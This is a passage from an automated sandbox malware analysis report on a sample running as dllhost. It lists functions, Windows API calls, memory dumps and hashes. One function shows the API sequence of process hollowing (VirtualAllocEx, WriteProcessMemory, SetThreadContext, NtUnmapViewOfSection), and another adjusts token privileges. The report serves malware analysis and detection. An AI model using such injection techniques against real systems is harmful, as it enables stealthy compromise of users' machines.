Associated: 00000028.00000002.2674116081.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2674989251.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_140000000_dllhost.jbxd

Similarity

API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
String ID:
API String ID: 1323846700-0
Opcode ID: 129a76087fcf8d85bc51ac130c76dfd69e86b58b274f62a94307b14953ecb4ac
Instruction ID: 9fe7bf929bc7bac8d1627b31ede7e1d2709182ad911688bdebd710bde7565a1c
Opcode Fuzzy Hash: 129a76087fcf8d85bc51ac130c76dfd69e86b58b274f62a94307b14953ecb4ac
Instruction Fuzzy Hash: 78115EB1B0564086FB16DF27F84439A67A1AB8DBD4F488028FF0903776EE39C586C704

Function 000001C0401FF598 Relevance: 3.1, APIs: 2, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32 ref: 000001C0401FF611
GetFileType.KERNELBASE ref: 000001C0401FF627

Memory Dump Source

Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true

Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
Instruction ID: 32d20d8894fb653fcc8e95b84d5b9ec1467fcae6529ebdf8185e6a04f494506c
Opcode Fuzzy Hash: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
Instruction Fuzzy Hash: 6831BF32650B46C1FB69CB1495806AA6A50FB49FB8F68030DDB6BA73F0CF75D4A1E340

Function 000001C0401CF598 Relevance: 3.1, APIs: 2, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32 ref: 000001C0401CF611
GetFileType.KERNELBASE ref: 000001C0401CF627

Memory Dump Source

Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true

Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
Instruction ID: f7504b1b88daa5d9a6f07de7bd1b160aeb076d389091d04c1229f8583652e373
Opcode Fuzzy Hash: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
Instruction Fuzzy Hash: 2131B632694B54D1F769CB1495806AA2660F34DFB8F65030EDB6B673F0CB35D461E340

Function 000001C03F6E2EBC Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE ref: 000001C03F6E302E

Memory Dump Source

Source File: 00000028.00000003.2319649635.000001C03F6E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C03F6E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_3_1c03f6e0000_dllhost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction ID: 66010a1336349efbcbd62fad13929535b9b1da2a3d19698ef3c06678d10c4935
Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction Fuzzy Hash: 3191267BB41590CBEB518F25D601FED7B99FBA8B98F54A03C9E8907788DA34D812C700

Function 0000000140002D38 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140002D4C: OpenMutexW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D6C
Part of subcall function 0000000140002D4C: Sleep.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D7C
Part of subcall function 0000000140002D4C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D87
Part of subcall function 0000000140002D4C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DA5
Part of subcall function 0000000140002D4C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DB5
Part of subcall function 0000000140002D4C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DCF
Part of subcall function 0000000140002D4C: LookupPrivilegeValueW.ADVAPI32 ref: 0000000140002DE6
Part of subcall function 0000000140002D4C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002E20
Part of subcall function 0000000140002D4C: GetLastError.KERNEL32 ref: 0000000140002E2A
Part of subcall function 0000000140002D4C: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E33
Part of subcall function 0000000140002D4C: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E5C
Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E8C
Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EBC
Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002ED0
Part of subcall function 0000000140002D4C: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EDE
Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EF1

ExitProcess.KERNEL32 ref: 0000000140002D43

Memory Dump Source

Source File: 00000028.00000002.2673229610.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000028.00000002.2672435865.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2674116081.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2674989251.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_140000000_dllhost.jbxd

Similarity

API ID: Process$Open$HeapValue$CloseHandleQueryToken$AdjustAllocCurrentErrorExitLastLookupMutexPrivilegePrivilegesSleep
String ID:
API String ID: 3805535264-0
Opcode ID: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
Instruction ID: 466ff6e6ce30b805044d1f2dc35dca8baccd3c328fc793c3ea1e6e53ebee4899
Opcode Fuzzy Hash: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
Instruction Fuzzy Hash: 15A002F0F2258083EB0AB7B7B85A3DD25B1ABAC781F100416B2024B2B3DE3C48954759

Non-executed Functions

Function 0000000140002434 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 317injectionthreadmemoryCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32 ref: 000000014000252A
VirtualAllocEx.KERNEL32 ref: 0000000140002581
WriteProcessMemory.KERNEL32 ref: 00000001400025A9
VirtualProtectEx.KERNEL32 ref: 00000001400025D4
WriteProcessMemory.KERNEL32 ref: 0000000140002613
VirtualProtectEx.KERNEL32 ref: 000000014000265D
VirtualAlloc.KERNEL32 ref: 0000000140002693
GetThreadContext.KERNEL32 ref: 00000001400026B6
WriteProcessMemory.KERNEL32 ref: 00000001400026E1
SetThreadContext.KERNEL32 ref: 0000000140002704
ResumeThread.KERNEL32 ref: 0000000140002717
VirtualAllocEx.KERNEL32 ref: 0000000140002759
WriteProcessMemory.KERNEL32 ref: 0000000140002781
VirtualProtectEx.KERNEL32 ref: 00000001400027AB
WriteProcessMemory.KERNEL32 ref: 00000001400027EA
VirtualProtectEx.KERNEL32 ref: 0000000140002834
VirtualAlloc.KERNEL32 ref: 0000000140002869
Wow64GetThreadContext.KERNEL32 ref: 0000000140002887
WriteProcessMemory.KERNEL32 ref: 00000001400028AC
Wow64SetThreadContext.KERNEL32 ref: 00000001400028CA
OpenProcess.KERNEL32 ref: 00000001400028E6
TerminateProcess.KERNEL32 ref: 00000001400028F6

Part of subcall function 00000001400020CC: GetModuleHandleA.KERNEL32(?,?,00000000,0000000140002C18), ref: 00000001400020DC
Part of subcall function 00000001400020CC: GetProcAddress.KERNEL32(?,?,00000000,0000000140002C18), ref: 00000001400020EF

Strings

@, xrefs: 0000000140002751
NtUnmapViewOfSection, xrefs: 000000014000253C
RtlGetVersion, xrefs: 000000014000249B
h, xrefs: 00000001400024EE

Memory Dump Source

Source File: 00000028.00000002.2673229610.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000028.00000002.2672435865.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2674116081.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2674989251.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_140000000_dllhost.jbxd

Similarity

API ID: Process$Virtual$MemoryWrite$Thread$AllocContextProtect$Wow64$AddressCreateHandleModuleOpenProcResumeTerminate
String ID: @$NtUnmapViewOfSection$RtlGetVersion$h
API String ID: 1036100660-1371749706
Opcode ID: fd1195e2308bccc300b2ff8f21b2c4cfd69eb2883e391b150e12868519e03b4e
Instruction ID: 2cc4599025b35cf826ffc418a6ccceb484f0f008c335a408c33283198f0c2c0b
Opcode Fuzzy Hash: fd1195e2308bccc300b2ff8f21b2c4cfd69eb2883e391b150e12868519e03b4e
Instruction Fuzzy Hash: DAD15DB6705A8187EB65CF63F84479AB7A0F788BC4F004025EB8A47BA4DF78D595CB04

Function 0000000140001274 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 136memoryregistrystringCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000001400012D1
GetProcessHeap.KERNEL32 ref: 00000001400012DF
HeapAlloc.KERNEL32 ref: 00000001400012F0
RegEnumValueW.ADVAPI32 ref: 000000014000134F
StrCmpIW.SHLWAPI ref: 0000000140001388
StrCmpW.SHLWAPI ref: 0000000140001390
GetProcessHeap.KERNEL32 ref: 00000001400013C7
HeapAlloc.KERNEL32 ref: 00000001400013D5
GetProcessHeap.KERNEL32 ref: 00000001400013F2
HeapFree.KERNEL32 ref: 0000000140001400
lstrlenW.KERNEL32 ref: 0000000140001409
GetProcessHeap.KERNEL32 ref: 0000000140001417
HeapAlloc.KERNEL32 ref: 0000000140001425
StrCpyW.SHLWAPI ref: 0000000140001447
GetProcessHeap.KERNEL32 ref: 000000014000145E
HeapFree.KERNEL32 ref: 000000014000146C

Strings

d, xrefs: 0000000140001312

Memory Dump Source

Source File: 00000028.00000002.2673229610.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000028.00000002.2672435865.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2674116081.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2674989251.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 52c6d37a2af4a1d6a0e24c1d193143f06bb7b356f12ba86b493c37bc12672881
Instruction ID: 9172d928bd221ff1096d4d6b158f49becdf828e9a984a0b33df103b3ad9988b4
Opcode Fuzzy Hash: 52c6d37a2af4a1d6a0e24c1d193143f06bb7b356f12ba86b493c37bc12672881
Instruction Fuzzy Hash: 765138B2604B8086EB16DF62F4483AA77A1F79CBD9F444124EB4A07B78DF38C555C710

Function 000001C0401F2FF0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256stringlibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 000001C0401F3094
lstrlenW.KERNEL32 ref: 000001C0401F32BE

Part of subcall function 000001C0401F1A30: OpenProcess.KERNEL32 ref: 000001C0401F1A56
Part of subcall function 000001C0401F1A30: K32GetModuleFileNameExW.KERNEL32 ref: 000001C0401F1A74
Part of subcall function 000001C0401F1A30: PathFindFileNameW.SHLWAPI ref: 000001C0401F1A83
Part of subcall function 000001C0401F1A30: lstrlenW.KERNEL32 ref: 000001C0401F1A8F
Part of subcall function 000001C0401F1A30: StrCpyW.SHLWAPI ref: 000001C0401F1AA2
Part of subcall function 000001C0401F1A30: CloseHandle.KERNEL32 ref: 000001C0401F1AB0

GetProcAddress.KERNEL32 ref: 000001C0401F30A9

Part of subcall function 000001C0401F3F88: StrCmpNIW.SHLWAPI(?,?,?,000001C0401F272F), ref: 000001C0401F3FA0

StrCmpNIW.SHLWAPI ref: 000001C0401F30EC
lstrlenW.KERNEL32 ref: 000001C0401F3214

Strings

\Device\Nsi, xrefs: 000001C0401F30DF
NtQueryObject, xrefs: 000001C0401F309F
ntdll.dll, xrefs: 000001C0401F308D

Memory Dump Source

Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true

Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction ID: cfbbca6e415e2c7f8196921807c04c9e792dbd89ccdd68d3b0ec4706a07710ea
Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction Fuzzy Hash: 3EB14972254692C2FB6EDF25D540BEBA3A4F788F88F545016EF0A63BA4DE35C980C340

Function 000001C0401C2FF0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256stringlibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 000001C0401C3094
lstrlenW.KERNEL32 ref: 000001C0401C32BE

Part of subcall function 000001C0401C1A30: OpenProcess.KERNEL32 ref: 000001C0401C1A56
Part of subcall function 000001C0401C1A30: K32GetModuleFileNameExW.KERNEL32 ref: 000001C0401C1A74
Part of subcall function 000001C0401C1A30: PathFindFileNameW.SHLWAPI ref: 000001C0401C1A83
Part of subcall function 000001C0401C1A30: lstrlenW.KERNEL32 ref: 000001C0401C1A8F
Part of subcall function 000001C0401C1A30: StrCpyW.SHLWAPI ref: 000001C0401C1AA2
Part of subcall function 000001C0401C1A30: CloseHandle.KERNEL32 ref: 000001C0401C1AB0

GetProcAddress.KERNEL32 ref: 000001C0401C30A9

Part of subcall function 000001C0401C3F88: StrCmpNIW.SHLWAPI(?,?,?,000001C0401C272F), ref: 000001C0401C3FA0

StrCmpNIW.SHLWAPI ref: 000001C0401C30EC
lstrlenW.KERNEL32 ref: 000001C0401C3214

Strings

NtQueryObject, xrefs: 000001C0401C309F
\Device\Nsi, xrefs: 000001C0401C30DF
ntdll.dll, xrefs: 000001C0401C308D

Memory Dump Source

Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true

Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction ID: 05c00fcd45c724e7c45cff46a495c915153de125a48bdd352fada8121a307574
Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction Fuzzy Hash: F9B15C72298690C6FB6EDF26D540BDAA3A4FB48F88F545016EF4A63BA4DE35CD40C740

Function 000001C0401F84B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000001C0401F84CC
RtlCaptureContext.NTDLL ref: 000001C0401F84F9
RtlLookupFunctionEntry.NTDLL ref: 000001C0401F8513
RtlVirtualUnwind.NTDLL ref: 000001C0401F8554
IsDebuggerPresent.KERNEL32 ref: 000001C0401F85A8
SetUnhandledExceptionFilter.KERNEL32 ref: 000001C0401F85C5
UnhandledExceptionFilter.KERNEL32 ref: 000001C0401F85D0

Memory Dump Source

Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true

Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction ID: 8197a02182764d63abef3b5f0a9a5d7d68f587fd919c014875ad8a41159d3f9b
Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction Fuzzy Hash: 41313972205B81CAEB69DF60E8507EE6364F789748F44402ADB4E57BA5DF78C5488710

Function 000001C0401C84B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000001C0401C84CC
RtlCaptureContext.NTDLL ref: 000001C0401C84F9
RtlLookupFunctionEntry.NTDLL ref: 000001C0401C8513
RtlVirtualUnwind.NTDLL ref: 000001C0401C8554
IsDebuggerPresent.KERNEL32 ref: 000001C0401C85A8
SetUnhandledExceptionFilter.KERNEL32 ref: 000001C0401C85C5
UnhandledExceptionFilter.KERNEL32 ref: 000001C0401C85D0

Memory Dump Source

Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true

Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction ID: 7acd93f044d19ee7b4c6ecf2f55b70d0f026810908cc869920af204cec96f529
Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction Fuzzy Hash: E331F976245B80CAFB69DF60E8907EE6364F788B48F44402ADB4E57BA5DF78C548C710

Function 000001C0401FCD80 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000001C0401FCE0B
RtlLookupFunctionEntry.NTDLL ref: 000001C0401FCE23
RtlVirtualUnwind.NTDLL ref: 000001C0401FCE5E
IsDebuggerPresent.KERNEL32 ref: 000001C0401FCE97
SetUnhandledExceptionFilter.KERNEL32 ref: 000001C0401FCEA1
UnhandledExceptionFilter.KERNEL32 ref: 000001C0401FCEAC

Memory Dump Source

Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true

Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction ID: b976ef55ed713149770ff284234e858a30d7340b325bec38d42b645c97bcf488
Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction Fuzzy Hash: 9A415832214B81C6EB69CB25E8407DF73A4F789B98F500225EB8E56BA9DF38C155CB00

Function 000001C0401CCD80 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000001C0401CCE0B
RtlLookupFunctionEntry.NTDLL ref: 000001C0401CCE23
RtlVirtualUnwind.NTDLL ref: 000001C0401CCE5E
IsDebuggerPresent.KERNEL32 ref: 000001C0401CCE97
SetUnhandledExceptionFilter.KERNEL32 ref: 000001C0401CCEA1
UnhandledExceptionFilter.KERNEL32 ref: 000001C0401CCEAC

Memory Dump Source

Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true

Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction ID: 9102aabf95f81014d42ced0451e5bd277f77fbea22f18e17977aadbe9fcca6c6
Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction Fuzzy Hash: 5D415B36254B80C6FB65DB24E8407DE77A4F789B98F500125EB8E57BA8DF38C559CB00

Function 000001C0401FDA18 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 000001C0401FDB99
FindNextFileW.KERNEL32 ref: 000001C0401FDCCF
FindClose.KERNEL32 ref: 000001C0401FDD0F
FindClose.KERNEL32 ref: 000001C0401FDD3B

Memory Dump Source

Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true

Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction ID: 7104bc21b50e117f1c7faf8e45eb988fdbd32f8cc297e4f9de7045eecbf92355
Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction Fuzzy Hash: 83A1D432744682C9FB2ADB75A440BFF7BA2A789F9CF144115DB9A37AB9DA34C441C700

Function 000001C0401CDA18 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 000001C0401CDB99
FindNextFileW.KERNEL32 ref: 000001C0401CDCCF
FindClose.KERNEL32 ref: 000001C0401CDD0F
FindClose.KERNEL32 ref: 000001C0401CDD3B

Memory Dump Source

Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true

Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction ID: d3274830dad9adf84ac85d72772a18b6c18389064a638dcd852d34f2736f1061
Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
